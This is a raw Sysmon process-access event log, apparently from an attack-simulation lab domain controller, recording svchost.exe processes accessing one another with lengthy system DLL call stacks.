13:58:22.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.836{59A5CD1D-93FB-6005-FE04-00000000A301}5108820C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000011111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000011109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000011107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 